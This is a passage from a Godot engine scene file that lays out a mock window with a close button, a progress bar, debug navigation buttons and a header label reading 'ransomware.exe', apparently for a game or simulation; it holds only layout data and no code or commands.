theme_override_styles/panel = SubResource("StyleBoxFlat_h8m8q")

[node name="WindowContents" type="VBoxContainer" parent="WindowBackground/Window"]
layout_mode = 2

[node name="WindowHeader" type="PanelContainer" parent="WindowBackground/Window/WindowContents"]
custom_minimum_size = Vector2(0, 30)
layout_mode = 2
theme_override_styles/panel = SubResource("StyleBoxFlat_pkbn6")

[node name="Button" type="Button" parent="WindowBackground/Window/WindowContents/WindowHeader"]
layout_mode = 2
size_flags_horizontal = 8
theme_override_fonts/font = ExtResource("3_oducy")
theme_override_styles/normal = SubResource("StyleBoxEmpty_cxtjw")
theme_override_styles/pressed = SubResource("StyleBoxEmpty_wf7ls")
theme_override_styles/hover = SubResource("StyleBoxEmpty_vuf0p")
theme_override_styles/disabled = SubResource("StyleBoxEmpty_31cwg")
theme_override_styles/focus = SubResource("StyleBoxEmpty_x5n46")
text = "X"

[node name="SampleHeader" type="Label" parent="WindowBackground/Window/WindowContents/WindowHeader"]
layout_mode = 2
text = "ransomware.exe"

[node name="MarginContainer" type="MarginContainer" parent="WindowBackground/Window/WindowContents"]
layout_mode = 2
theme_override_constants/margin_left = 5
theme_override_constants/margin_right = 5

[node name="SampleContent" type="Label" parent="WindowBackground/Window/WindowContents/MarginContainer"]
visible = false
layout_mode = 2
theme_override_font_sizes/font_size = 31
text = "Contents"

[node name="ProgressBar" type="ProgressBar" parent="WindowBackground/Window/WindowContents/MarginContainer"]
layout_mode = 2
size_flags_vertical = 4

[node name="Debug" type="Control" parent="."]
visible = false
anchors_preset = 0
offset_right = 40.0
offset_bottom = 40.0

[node name="Next" parent="Debug" instance=ExtResource("5_evr5x")]
layout_mode = 1
anchor_left = 0.736111
anchor_top = 0.802469
anchor_right = 0.865451
anchor_bottom = 0.859568
offset_left = 818.55505
offset_top = 487.90118
offset_right = 962.3815
offset_bottom = 522.6172

[node name="Back" parent="Debug" instance=ExtResource("6_l34d4")]
layout_mode = 1
anchor_left = 0.131944
anchor_top = 0.802469
anchor_right = 0.262153
anchor_bottom = 0.859568
offset_left = 146.72173
offset_top = 487.90118
offset_right = 291.51337
offset_bottom = 522.6172
text = "Back"

[connection signal="pressed" from="WindowBackground/Window/WindowContents/WindowHeader/Button" to="WindowBackground" method="_on_button_pressed"]
